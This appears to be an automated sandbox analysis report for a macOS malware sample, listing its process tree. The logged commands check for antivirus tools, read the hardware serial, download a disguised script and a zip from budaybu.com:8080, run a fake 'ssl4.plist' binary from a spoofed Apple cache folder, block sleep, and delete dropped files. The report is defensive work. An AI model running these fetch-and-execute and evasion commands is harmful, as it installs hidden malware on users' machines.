                                Analysis Process: grep PID: 643 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 644 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 644 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 645 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 645 Parent PID: 641

                                General

                                Start time:11:04:04
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $1}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 552 Parent PID: 548

                                General

                                Start time:11:00:16
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 552 Parent PID: 548

                                General

                                Start time:11:00:16
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c rm ~/Library/k.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: rm PID: 552 Parent PID: 548

                                General

                                Start time:11:00:16
                                Start date:15/01/2021
                                Path:/bin/rm
                                Arguments:rm /Users/henry/Library/k.plist
                                File size:23952 bytes
                                MD5 hash:11b6a6a1a3102d67ef723cadda365da7

                                Chronological Activities

                                Analysis Process: osascript PID: 553 Parent PID: 548

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 553 Parent PID: 548

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 554 Parent PID: 553

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: system_profiler PID: 554 Parent PID: 553

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:/usr/sbin/system_profiler SPHardwareDataType
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: system_profiler PID: 556 Parent PID: 554

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:n/a
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: sh PID: 555 Parent PID: 553

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 555 Parent PID: 553

                                General

                                Start time:11:00:26
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk /Serial/ { print $NF }
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 557 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 557 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c ping -c 1 www.apple.com
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ping PID: 557 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/sbin/ping
                                Arguments:ping -c 1 www.apple.com
                                File size:41968 bytes
                                MD5 hash:d91d8718ec1f2d5bcd4c02e7cad8282a

                                Chronological Activities

                                Analysis Process: osascript PID: 558 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 558 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c curl http://www.budaybu100001.com:8080
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: curl PID: 558 Parent PID: 548

                                General

                                Start time:11:00:43
                                Start date:15/01/2021
                                Path:/usr/bin/curl
                                Arguments:curl http://www.budaybu100001.com:8080
                                File size:185104 bytes
                                MD5 hash:078cd73f58d3d8f875eed22522ff73f7

                                Chronological Activities

                                Analysis Process: osascript PID: 559 Parent PID: 548

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 559 Parent PID: 548

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c curl -L http://budaybu.com:8080/budaybu.png -o ~/Library/11.png
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: curl PID: 559 Parent PID: 548

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/usr/bin/curl
                                Arguments:curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.png
                                File size:185104 bytes
                                MD5 hash:078cd73f58d3d8f875eed22522ff73f7

                                Chronological Activities

                                Analysis Process: osascript PID: 560 Parent PID: 548

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 560 Parent PID: 548

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c osascript ~/Library/11.png > /dev/null 2> /dev/null &
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 561 Parent PID: 560

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: osascript PID: 561 Parent PID: 560

                                General

                                Start time:11:00:44
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:osascript /Users/henry/Library/11.png
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: osascript PID: 562 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 562 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c df -g / | grep / | grep -v grep | awk '{print $2}'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 563 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: df PID: 563 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/df
                                Arguments:df -g /
                                File size:23392 bytes
                                MD5 hash:81164469cf7add4a64a67fc25d1f7e8a

                                Chronological Activities

                                Analysis Process: sh PID: 564 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 564 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep /
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 565 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: grep PID: 565 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/grep
                                Arguments:grep -v grep
                                File size:33936 bytes
                                MD5 hash:2b3efb273296881708ea2914c612e0eb

                                Chronological Activities

                                Analysis Process: sh PID: 566 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 566 Parent PID: 562

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk {print $2}
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 567 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 567 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c caffeinate -d &> /dev/null & echo $!
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 568 Parent PID: 567

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: caffeinate PID: 568 Parent PID: 567

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/caffeinate
                                Arguments:caffeinate -d
                                File size:24416 bytes
                                MD5 hash:56e8503a6220d4017ab8c2910f1fc950

                                Chronological Activities

                                Analysis Process: osascript PID: 569 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 569 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c caffeinate -i &> /dev/null & echo $!
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 570 Parent PID: 569

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: caffeinate PID: 570 Parent PID: 569

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/caffeinate
                                Arguments:caffeinate -i
                                File size:24416 bytes
                                MD5 hash:56e8503a6220d4017ab8c2910f1fc950

                                Chronological Activities

                                Analysis Process: osascript PID: 571 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 571 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c caffeinate -m &> /dev/null & echo $!
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 572 Parent PID: 571

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: caffeinate PID: 572 Parent PID: 571

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/caffeinate
                                Arguments:caffeinate -m
                                File size:24416 bytes
                                MD5 hash:56e8503a6220d4017ab8c2910f1fc950

                                Chronological Activities

                                Analysis Process: osascript PID: 573 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 573 Parent PID: 561

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c caffeinate -s &> /dev/null & echo $!
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 574 Parent PID: 573

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: caffeinate PID: 574 Parent PID: 573

                                General

                                Start time:11:00:45
                                Start date:15/01/2021
                                Path:/usr/bin/caffeinate
                                Arguments:caffeinate -s
                                File size:24416 bytes
                                MD5 hash:56e8503a6220d4017ab8c2910f1fc950

                                Chronological Activities

                                Analysis Process: osascript PID: 576 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 576 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 577 Parent PID: 576

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: system_profiler PID: 577 Parent PID: 576

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:/usr/sbin/system_profiler SPHardwareDataType
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: system_profiler PID: 579 Parent PID: 577

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:n/a
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: sh PID: 578 Parent PID: 576

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: awk PID: 578 Parent PID: 576

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/bin/awk
                                Arguments:awk /Serial/ { print $NF }
                                File size:112592 bytes
                                MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

                                Chronological Activities

                                Analysis Process: osascript PID: 580 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 580 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c mkdir ~/library/Caches
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: mkdir PID: 580 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/mkdir
                                Arguments:mkdir /Users/henry/library/Caches
                                File size:18592 bytes
                                MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

                                Chronological Activities

                                Analysis Process: osascript PID: 581 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 581 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c mkdir ~/library/Caches/com.apple.R0
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: mkdir PID: 581 Parent PID: 561

                                General

                                Start time:11:00:48
                                Start date:15/01/2021
                                Path:/bin/mkdir
                                Arguments:mkdir /Users/henry/library/Caches/com.apple.R0
                                File size:18592 bytes
                                MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

                                Chronological Activities

                                Analysis Process: osascript PID: 582 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 582 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c system_profiler SPHardwareDataType
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: system_profiler PID: 582 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:system_profiler SPHardwareDataType
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: system_profiler PID: 583 Parent PID: 582

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/sbin/system_profiler
                                Arguments:n/a
                                File size:45472 bytes
                                MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

                                Chronological Activities

                                Analysis Process: osascript PID: 584 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 584 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c [ -e ~/library/Caches/com.apple.R0/ssl4.plist ] && echo true || echo false
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: osascript PID: 585 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 585 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c curl -L http://budaybu.com:8080/ssl.zip -o ~/library/Caches/com.apple.R0/ssl.zip
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: curl PID: 585 Parent PID: 561

                                General

                                Start time:11:00:49
                                Start date:15/01/2021
                                Path:/usr/bin/curl
                                Arguments:curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zip
                                File size:185104 bytes
                                MD5 hash:078cd73f58d3d8f875eed22522ff73f7

                                Chronological Activities

                                Analysis Process: osascript PID: 586 Parent PID: 561

                                General

                                Start time:11:00:54
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 586 Parent PID: 561

                                General

                                Start time:11:00:54
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c /usr/bin/ditto -xk ~/library/Caches/com.apple.R0/ssl.zip ~/library/Caches/com.apple.R0
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ditto PID: 586 Parent PID: 561

                                General

                                Start time:11:00:54
                                Start date:15/01/2021
                                Path:/usr/bin/ditto
                                Arguments:/usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0
                                File size:34528 bytes
                                MD5 hash:5e90ed3b53d4ac63096f6727363249c5

                                Chronological Activities

                                Analysis Process: osascript PID: 593 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 593 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c rm ~/library/Caches/com.apple.R0/ssl.zip
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: rm PID: 593 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/bin/rm
                                Arguments:rm /Users/henry/library/Caches/com.apple.R0/ssl.zip
                                File size:23952 bytes
                                MD5 hash:11b6a6a1a3102d67ef723cadda365da7

                                Chronological Activities

                                Analysis Process: osascript PID: 594 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 594 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c pgrep ssl4.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: pgrep PID: 594 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/usr/bin/pgrep
                                Arguments:pgrep ssl4.plist
                                File size:30512 bytes
                                MD5 hash:96a4d2f3aecec616f31f66589f196205

                                Chronological Activities

                                Analysis Process: osascript PID: 595 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 595 Parent PID: 561

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c cd ~/library/Caches/com.apple.R0 ~/library/Caches/com.apple.R0/ssl4.plist &> /dev/null & exit
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: sh PID: 596 Parent PID: 595

                                General

                                Start time:11:00:56
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: ssl4.plist PID: 596 Parent PID: 595

                                General

                                Start time:11:00:57
                                Start date:15/01/2021
                                Path:/Users/henry/library/Caches/com.apple.R0/ssl4.plist
                                Arguments:/Users/henry/library/Caches/com.apple.R0/ssl4.plist
                                File size:698576 bytes
                                MD5 hash:deb6c97315615faa44a0ac07244e7570

                                Chronological Activities

                                Analysis Process: osascript PID: 602 Parent PID: 561

                                General

                                Start time:11:01:37
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 602 Parent PID: 561

                                General

                                Start time:11:01:37
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c pgrep ssl4.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: pgrep PID: 602 Parent PID: 561

                                General

                                Start time:11:01:37
                                Start date:15/01/2021
                                Path:/usr/bin/pgrep
                                Arguments:pgrep ssl4.plist
                                File size:30512 bytes
                                MD5 hash:96a4d2f3aecec616f31f66589f196205

                                Chronological Activities

                                Analysis Process: osascript PID: 613 Parent PID: 561

                                General

                                Start time:11:02:17
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 613 Parent PID: 561

                                General

                                Start time:11:02:17
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c pgrep ssl4.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: pgrep PID: 613 Parent PID: 561

                                General

                                Start time:11:02:17
                                Start date:15/01/2021
                                Path:/usr/bin/pgrep
                                Arguments:pgrep ssl4.plist
                                File size:30512 bytes
                                MD5 hash:96a4d2f3aecec616f31f66589f196205

                                Chronological Activities

                                Analysis Process: osascript PID: 624 Parent PID: 561

                                General

                                Start time:11:02:57
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 624 Parent PID: 561

                                General

                                Start time:11:02:57
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c pgrep ssl4.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: pgrep PID: 624 Parent PID: 561

                                General

                                Start time:11:02:57
                                Start date:15/01/2021
                                Path:/usr/bin/pgrep
                                Arguments:pgrep ssl4.plist
                                File size:30512 bytes
                                MD5 hash:96a4d2f3aecec616f31f66589f196205

                                Chronological Activities

                                Analysis Process: osascript PID: 635 Parent PID: 561

                                General

                                Start time:11:03:37
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 635 Parent PID: 561

                                General

                                Start time:11:03:37
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c pgrep ssl4.plist
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: pgrep PID: 635 Parent PID: 561

                                General

                                Start time:11:03:37
                                Start date:15/01/2021
                                Path:/usr/bin/pgrep
                                Arguments:pgrep ssl4.plist
                                File size:30512 bytes
                                MD5 hash:96a4d2f3aecec616f31f66589f196205

                                Chronological Activities

                                Analysis Process: osascript PID: 575 Parent PID: 548

                                General

                                Start time:11:00:46
                                Start date:15/01/2021
                                Path:/usr/bin/osascript
                                Arguments:n/a
                                File size:43136 bytes
                                MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

                                Chronological Activities

                                Analysis Process: sh PID: 575 Parent PID: 548

                                General

                                Start time:11:00:46
                                Start date:15/01/2021
                                Path:/bin/sh
                                Arguments:sh -c rm ~/Library/11.png
                                File size:618512 bytes
                                MD5 hash:8aa60b22a5d30418a002b340989384dc

                                Chronological Activities

                                Analysis Process: rm PID: 575 Parent PID: 548

                                General

                                Start time:11:00:46
                                Start date:15/01/2021
                                Path:/bin/rm
